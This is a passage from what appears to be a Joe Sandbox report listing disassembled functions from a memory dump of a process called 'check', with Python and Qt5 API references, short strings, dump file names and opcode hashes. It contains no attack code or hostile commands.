1J1, xrefs: 00007FFD8628AE55

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: 3e8e180421ef01e4006b254664b1a6b40c6f1d96b0062d5c727f273a34fb66f7
Instruction ID: f7026672326e47c0a6416ccf584f813d5d28bd4f590f0d05b186810db2095901
Opcode Fuzzy Hash: 3e8e180421ef01e4006b254664b1a6b40c6f1d96b0062d5c727f273a34fb66f7
Instruction Fuzzy Hash: 4F214D76B09B4683EA118F1AF45416D77A4FB88BA4F144072EE4E13B64EF3CE956CB04

Function 00007FFD862781F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8627829A

Strings

1J1, xrefs: 00007FFD86278235

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J1
API String ID: 2610644205-2174808320
Opcode ID: b23800c0bcf6ea3a3e9c8525f15a4de631c0e0f6fae679fe9d3625cc274ab5fd
Instruction ID: af14c1192d9fb537f4ace60b866eabe2bf1337aa22ef7efdc7dc00d212cc18a6
Opcode Fuzzy Hash: b23800c0bcf6ea3a3e9c8525f15a4de631c0e0f6fae679fe9d3625cc274ab5fd
Instruction Fuzzy Hash: C6214D76B09B8682EA118F1AF45456E77A5FB88BA1F154072DE4D03B64EF3CE946CB00

Function 00007FFD86226A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD86226B2F

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?map@QTransform@@QEBA?AVQPolygonF@@AEBV2@@Z.QT5GUI ref: 00007FFD86226AEC

Strings

J9J9, xrefs: 00007FFD86226A8C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?map@DeallocPolygonTransform@@V2@@malloc
String ID: J9J9
API String ID: 3710048671-2881787613
Opcode ID: 1362be1ced3d985380d4a14639b9eb48e87698de1bcacac570d78c69a7211c88
Instruction ID: 6cbb28a440480abc423d984f7df06511d51036ea0f0fc98c11ec707c79dbe110
Opcode Fuzzy Hash: 1362be1ced3d985380d4a14639b9eb48e87698de1bcacac570d78c69a7211c88
Instruction Fuzzy Hash: 1D314A32B0CB4582EB408F5AE8A86AD73A5FB48BA0F594132DE5D03B60DF3CD844C700

Function 00007FFD8626AFF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD8626B0AF

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?map@QTransform@@QEBA?AVQRegion@@AEBV2@@Z.QT5GUI ref: 00007FFD8626B06C

Strings

J9J9, xrefs: 00007FFD8626B00C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?map@DeallocRegion@@Transform@@V2@@malloc
String ID: J9J9
API String ID: 4294278014-2881787613
Opcode ID: 58a274e6a23ad1d7dc10c37a2cdaa93ee1589181837864e419cb53ec8feea50e
Instruction ID: fddfd32359418fe5273478d309a1e93df53683b2c67260c1c19253f2a455d057
Opcode Fuzzy Hash: 58a274e6a23ad1d7dc10c37a2cdaa93ee1589181837864e419cb53ec8feea50e
Instruction Fuzzy Hash: EB312976B08B4582EB409F1AE8686AD73A6FB58BA0F594131DF5D03764EF3DD850C700

Function 00007FFD86286E90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD86286F1B

Strings

1J9, xrefs: 00007FFD86286ED3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J9
API String ID: 2610644205-2407233842
Opcode ID: 6a35b8314972c48080d9217d0de033bc709df95412995208a3892979b2850fde
Instruction ID: 1f37c15ee16787013e14dc1f925e1e282231485828181443293bfeb6e1ddf892
Opcode Fuzzy Hash: 6a35b8314972c48080d9217d0de033bc709df95412995208a3892979b2850fde
Instruction Fuzzy Hash: FA216236B09B4286EA018F56F8146BD73A4FB94BA5F084171DE4D03764DF3CE991C700

Function 00007FFD86282FC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD8628304B

Strings

1J9, xrefs: 00007FFD86283003

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J9
API String ID: 2610644205-2407233842
Opcode ID: cdc11a8826fb83d47ec671800cf94f89d43ab86083a429b32d21a501e0e3323c
Instruction ID: 14df4080215502f2d8dff0e5a0b1e315521ac775ab77bbadebba24f623387e3d
Opcode Fuzzy Hash: cdc11a8826fb83d47ec671800cf94f89d43ab86083a429b32d21a501e0e3323c
Instruction Fuzzy Hash: 34216076B09B4286EA018F96F8641BDA3A4FF99BA5F084172DE4D07764DF3CE891C700

Function 00007FFD86292D00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD86292D8B

Strings

1J9, xrefs: 00007FFD86292D43

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: 1J9
API String ID: 2610644205-2407233842
Opcode ID: 39bc1fcf4d55ef9ff5331cfc3a91c2b18f535f11941e2eeadbba54c3edcb4c45
Instruction ID: 97cd3d322795045043f00fb795bd4f277a9b3c65813b642ecbf5c92154cfa272
Opcode Fuzzy Hash: 39bc1fcf4d55ef9ff5331cfc3a91c2b18f535f11941e2eeadbba54c3edcb4c45
Instruction Fuzzy Hash: AA213B36B0AB4286EA019B55F4656B9B7A4FF94BA5F084172DE4D03768DF3CE885C700

Function 00007FFD862A2E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD862A2F35

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

??UQPainterPath@@QEBA?AV0@AEBV0@@Z.QT5GUI ref: 00007FFD862A2EF2

Strings

J9J9, xrefs: 00007FFD862A2EAD

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: DeallocPainterPath@@V0@@malloc
String ID: J9J9
API String ID: 3358426265-2881787613
Opcode ID: ffa6a78a7bc1e32e0a9dce76ef67f047718897d71e4e57ec508c4dcad33a63dc
Instruction ID: 0f085e221ac0140241c0c3ed143ce72fba7b24b420802b3867907226d731c428
Opcode Fuzzy Hash: ffa6a78a7bc1e32e0a9dce76ef67f047718897d71e4e57ec508c4dcad33a63dc
Instruction Fuzzy Hash: 39214B72B0CA4182EB40CB19E8696AD73A5FB88BA0F594176DE5C43B64DF3CD841CB00

Function 00007FFD86236F90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD86237071

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

EJ1, xrefs: 00007FFD86236F99

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Deallocmalloc
String ID: EJ1
API String ID: 2267669106-3528995212
Opcode ID: e3cf892f456fdc0b81aa8293964b8a64003b91421e1ae6679ee944932567c0f2
Instruction ID: 7760c05edb8490018a4c349ca36eb4db8e414741643af11952c71557147de45b
Opcode Fuzzy Hash: e3cf892f456fdc0b81aa8293964b8a64003b91421e1ae6679ee944932567c0f2
Instruction Fuzzy Hash: 2F312736B08B46C5EB50DF56E8996AD73A4FB88BA0F944172CA4D43B24EF3DE944C700

Function 00007FFD8623B040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD8623B121

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

EJ1, xrefs: 00007FFD8623B049

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Deallocmalloc
String ID: EJ1
API String ID: 2267669106-3528995212
Opcode ID: afac661aed52372752b5108c7e456120b70d623c9921dbaa5fe9b80236636e41
Instruction ID: 31e87c2d9988632f923b47903ab90b3fe40d4b45b4eba2c8ceb6f40657eb6659
Opcode Fuzzy Hash: afac661aed52372752b5108c7e456120b70d623c9921dbaa5fe9b80236636e41
Instruction Fuzzy Hash: 57311836B08B4585EB50DF56E8992AD73A4FB88FA0F944036CA8D47720EF3DE844C700

Function 00007FFD8623CD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON3 ref: 00007FFD8623CE31

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

EJ1, xrefs: 00007FFD8623CD59

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
